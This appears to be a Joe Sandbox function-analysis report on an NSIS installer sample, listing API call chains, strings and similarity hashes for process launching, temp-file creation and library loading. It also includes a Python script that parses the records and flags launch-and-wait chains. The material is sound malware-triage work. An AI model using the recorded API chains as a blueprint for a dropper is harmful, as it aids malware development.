                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 496 40176f-401794 call 402d3e call 405d27 501 401796-40179c call 4063db 496->501 502 40179e-4017b0 call 4063db call 405cb0 lstrcatW 496->502 507 4017b5-4017b6 call 40668a 501->507 502->507 511 4017bb-4017bf 507->511 512 4017c1-4017cb call 406739 511->512 513 4017f2-4017f5 511->513 521 4017dd-4017ef 512->521 522 4017cd-4017db CompareFileTime 512->522 514 4017f7-4017f8 call 405eac 513->514 515 4017fd-401819 call 405ed1 513->515 514->515 523 40181b-40181e 515->523 524 40188d-4018b6 call 405443 call 40324c 515->524 521->513 522->521 525 401820-40185e call 4063db * 2 call 406418 call 4063db call 405a41 523->525 526 40186f-401879 call 405443 523->526 538 4018b8-4018bc 524->538 539 4018be-4018ca SetFileTime 524->539 525->511 558 401864-401865 525->558 536 401882-401888 526->536 541 402bcb 536->541 538->539 540 4018d0-4018db FindCloseChangeNotification 538->540 539->540 544 4018e1-4018e4 540->544 545 402bc2-402bc5 540->545 543 402bcd-402bd1 541->543 547 4018e6-4018f7 call 406418 lstrcatW 544->547 548 4018f9-4018fc call 406418 544->548 545->541 555 401901-40239a call 405a41 547->555 548->555 555->543 555->545 558->536 560 401867-401868 558->560 560->526
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                    • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                                                                                                                                                    • Part of subcall function 00405443: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                                                                                                                                                    • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                                                                                                                                                    • Part of subcall function 00405443: lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
• API String ID: 1941528284-1391832873
• Opcode ID: b59029357335a8af3f4a86e42d3be2ad60be171f7d8ba297da0cbaafdbd0df24
• Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
• Opcode Fuzzy Hash: b59029357335a8af3f4a86e42d3be2ad60be171f7d8ba297da0cbaafdbd0df24
• Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E

Control-flow Graph (legend: Executed / Not Executed; rendered graph of basic blocks starting at 405443, edge data not reproduced)
APIs
• lstrlenW.KERNEL32(004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
• lstrlenW.KERNEL32(00403385,004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
• lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
• SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: &B
• API String ID: 2531174081-3208460036
• Opcode ID: bea2b5a7135099c68aadf7c6861b5a1d546924ebcd1bbda38a4905401ce86b05
• Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
• Opcode Fuzzy Hash: bea2b5a7135099c68aadf7c6861b5a1d546924ebcd1bbda38a4905401ce86b05
• Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8

Control-flow Graph (legend: Executed / Not Executed; rendered graph of basic blocks starting at 406760, edge data not reproduced)
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
• wsprintfW.USER32 ref: 004067B2
• LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
• Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
• Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
• Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8

Control-flow Graph (legend: Executed / Not Executed; rendered graph of basic blocks starting at 40324c, edge data not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%
• API String ID: 551687249-2449383134
• Opcode ID: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
• Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
• Opcode Fuzzy Hash: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
• Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9

Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
APIs
• GetTickCount.KERNEL32 ref: 00405F1E
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,0040348D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9), ref: 00405F39
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-678247507
• Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
• Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
• Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
• Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68

Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
APIs
  • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 00405912: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D
Strings
• C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
• API String ID: 1892508949-455884830
• Opcode ID: 38de229b96fada6a2a749b4477b4eb55c198c22db0e46b32473b3478d97f3d28
• Instruction ID: 4b740b80641ba3a3eb8a8ec9adfde8f0bc1f07408697dd7e04d4643b588e1c06
• Opcode Fuzzy Hash: 38de229b96fada6a2a749b4477b4eb55c198c22db0e46b32473b3478d97f3d28
• Instruction Fuzzy Hash: 1411E231504114EBCF206FA5CD4199F37B0EF24328B28493BE912B12F1D63E49829B6E

Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
• Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
• Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
• Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                                                                                                                                                  • Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
• Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
• Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
• Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45
APIs
• GlobalFree.KERNELBASE(0077AD68), ref: 00401C0B
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Global$AllocFree
• String ID: open
• API String ID: 3394109436-2758837156
• Opcode ID: 8aa349daceb3bfa3e4c59c81c2926e7320354a40456f95440d029982943f30c3
• Instruction ID: 8eac660807c21ed12e13958da8917723c714091cd548f80009266c163e09adae
• Opcode Fuzzy Hash: 8aa349daceb3bfa3e4c59c81c2926e7320354a40456f95440d029982943f30c3
• Instruction Fuzzy Hash: 88219673604114DBD720AF94DDC4A5E73B4AB14324725453BF952F72D1C6BCAC418BAD
APIs
  • Part of subcall function 00405A07: ShellExecuteExW.SHELL32(?), ref: 00405A16
  • Part of subcall function 0040687B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
  • Part of subcall function 0040687B: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068AE
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
Strings
• @, xrefs: 00401F8A
• C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
• String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
• API String ID: 165873841-3372431936
• Opcode ID: ec455502b63788f10edc8ab64c154264d8a268f65a71d0e3b4a8938664c1ec49
• Instruction ID: 854b83587bfa871489f156109ad6bc95ad0bdfdde4298cee34a1320aee810ded
• Opcode Fuzzy Hash: ec455502b63788f10edc8ab64c154264d8a268f65a71d0e3b4a8938664c1ec49
• Instruction Fuzzy Hash: 51115871A002188ACB10EFB9CA49B8DB7F0AF18304F20857AE455F72D1DBBC89409F18
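The function records above are only useful in bulk if they can be read by a script: an analyst triaging a report like this one wants the API chain per function, not the fuzzy hashes. The following Python is an added example written for this page, not Joe Sandbox code and not part of the report. It parses records in the layout shown above (bullet lines under the APIs, Strings, Memory Dump Source and Similarity headers, with "Part of subcall function" entries folded in), pulls the WaitForSingleObject timeouts out of the argument lists, and flags functions whose chain launches a child process and polls for its exit code, which is what the ShellExecuteExW / WaitForSingleObject / GetExitCodeProcess / CloseHandle record describes. The record text embedded in the script is copied from the two records directly above; the spawn/wait API lists, the record boundary rule and the function names are the script's own assumptions.

```python
"""Parse Joe Sandbox function-analysis records and flag launch-and-wait API chains.

Added example for this page; not Joe Sandbox code. SAMPLE_REPORT is
constructed from two records of the report (whitespace trimmed).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SAMPLE_REPORT = r"""
APIs
• GlobalFree.KERNELBASE(0077AD68), ref: 00401C0B
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Global$AllocFree
• String ID: open
• API String ID: 3394109436-2758837156
• Opcode ID: 8aa349daceb3bfa3e4c59c81c2926e7320354a40456f95440d029982943f30c3
• Instruction Fuzzy Hash: 88219673604114DBD720AF94DDC4A5E73B4AB14324725453BF952F72D1C6BCAC418BAD
APIs
  • Part of subcall function 00405A07: ShellExecuteExW.SHELL32(?), ref: 00405A16
  • Part of subcall function 0040687B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
  • Part of subcall function 0040687B: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068AE
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
Strings
• @, xrefs: 00401F8A
• C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
• String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
• API String ID: 165873841-3372431936
• Opcode ID: ec455502b63788f10edc8ab64c154264d8a268f65a71d0e3b4a8938664c1ec49
• Instruction Fuzzy Hash: 51115871A002188ACB10EFB9CA49B8DB7F0AF18304F20857AE455F72D1DBBC89409F18
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.Module(args), ref: addr", optionally prefixed with the subcall note.
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")
STR_RE = re.compile(r"^(?P<s>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})$")
# Assumed API sets for the detection below (not from the report).
SPAWN_APIS = {"ShellExecuteExW", "ShellExecuteExA", "ShellExecuteW", "CreateProcessW", "CreateProcessA"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall_of: Optional[str] = None  # address of the callee when the API is reached indirectly


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    source: str = ""
    similarity: Dict[str, str] = field(default_factory=dict)

    def is_empty(self) -> bool:
        return not (self.apis or self.strings or self.source or self.similarity)

    @property
    def opcode_id(self) -> str:
        return self.similarity.get("Opcode ID", "")

    def api_names(self) -> set:
        return {c.name for c in self.apis}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into one FunctionRecord per function block."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            # A record starts with APIs when the function calls any, otherwise with Memory Dump Source.
            starts_new = line == "APIs" or (line == "Memory Dump Source" and bool(cur.source or cur.similarity))
            if starts_new and not cur.is_empty():
                records.append(cur)
                cur = FunctionRecord()
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], tuple(m["args"].split(",")), m["ref"], m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(body)
            if m:
                cur.strings.append(m["s"])
        elif section in ("Memory Dump Source", "Similarity"):
            key, _, value = body.partition(":")
            if section == "Similarity":
                cur.similarity[key.strip()] = value.strip()
            elif key.strip() == "Source File":
                cur.source = value.strip()
    if not cur.is_empty():
        records.append(cur)
    return records


def wait_timeouts_ms(rec: FunctionRecord) -> List[int]:
    """Decode the hex dwMilliseconds argument of every WaitForSingleObject call."""
    return [int(c.args[1], 16) for c in rec.apis
            if c.name == "WaitForSingleObject" and len(c.args) >= 2 and re.fullmatch(r"[0-9A-Fa-f]+", c.args[1])]


def launch_and_wait(rec: FunctionRecord) -> bool:
    """True when the chain spawns a process, waits on it and reads its exit code."""
    names = rec.api_names()
    return bool(names & SPAWN_APIS) and {"WaitForSingleObject", "GetExitCodeProcess"} <= names


def find_process_launchers(text: str) -> List[FunctionRecord]:
    return [r for r in parse_records(text) if launch_and_wait(r)]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        flag = "LAUNCH+WAIT" if launch_and_wait(rec) else ""
        print(rec.opcode_id[:12], sorted(rec.api_names()), wait_timeouts_ms(rec), rec.strings, flag)
```

The boundary rule (a record begins at APIs, or at Memory Dump Source when the previous block already has a source or similarity fields) is what makes functions without any API calls, like the two hash-only records above, parse as their own entries rather than being merged into a neighbour.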
APIs
• WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004068A1
• GetExitCodeProcess.KERNELBASE(?,?), ref: 004068AE
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2567322000-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401EFC
• EnableWindow.USER32(00000000,00000000), ref: 00401F07
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
• GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
  • Part of subcall function 00406760: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
  • Part of subcall function 00406760: wsprintfW.USER32 ref: 004067B2
  • Part of subcall function 00406760: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
APIs
